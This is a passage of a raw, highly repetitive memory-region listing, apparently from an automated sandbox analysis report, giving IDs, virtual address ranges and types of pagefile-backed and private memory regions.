"pagefile_0x00000000002a0000" filename = "" Region: id = 13770 start_va = 0x2a0000 end_va = 0x2b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13825 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 13826 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 13827 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 13828 start_va = 0x2b0000 end_va = 0x2c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 13829 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13830 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13831 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13832 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13833 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13834 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13835 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13836 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13837 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13838 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13839 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13840 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13841 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13842 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13843 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13844 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13845 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13846 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13847 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13848 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13849 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13850 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13851 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13852 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13853 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13854 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13855 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13856 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13857 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13858 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13859 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13860 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13861 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13862 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13863 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13864 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13865 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13866 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13867 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13868 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13869 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13870 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13871 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13872 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13873 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13874 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13875 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13876 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13877 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 13878 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 13879 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 13880 start_va = 0x2b0000 end_va = 0x2c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 13881 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13882 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13883 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13884 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13885 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13886 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13887 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13888 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13889 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13890 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13891 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13892 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13893 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13894 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13895 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13896 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13897 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13898 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13899 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13900 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13901 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13902 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13903 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13904 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13905 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13906 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13907 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13908 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13909 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13910 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13911 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13912 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13913 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13914 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13915 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13916 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13917 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13918 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13919 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13920 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13921 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13922 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13923 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13924 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13925 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13926 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13927 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13928 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13929 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 13930 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14157 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 14158 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 14159 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 14160 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 14161 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14162 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14163 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14164 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14165 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14166 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14167 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14168 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14169 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14170 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14171 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14172 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14173 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14174 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14175 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14176 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14177 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14178 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14179 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14180 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14181 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14182 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14183 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14184 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14185 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14186 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14187 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14188 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14189 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14190 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14191 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14192 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14193 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14219 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14220 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14221 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14222 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14223 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14224 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14225 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14226 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14227 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14228 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14229 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14230 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14231 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14232 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14233 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14234 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 14235 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 14236 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 14237 start_va = 0x2b0000 end_va = 0x2c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 14238 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14239 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14240 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14241 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14242 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14243 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14244 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14245 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14246 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14247 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14248 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14249 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14250 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14251 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14252 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14253 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14254 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14255 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14266 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14267 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14268 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14269 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14270 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14271 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14272 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14273 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14274 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14275 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14276 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14277 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14278 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14279 start_va = 0x2a0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 14280 start_va = 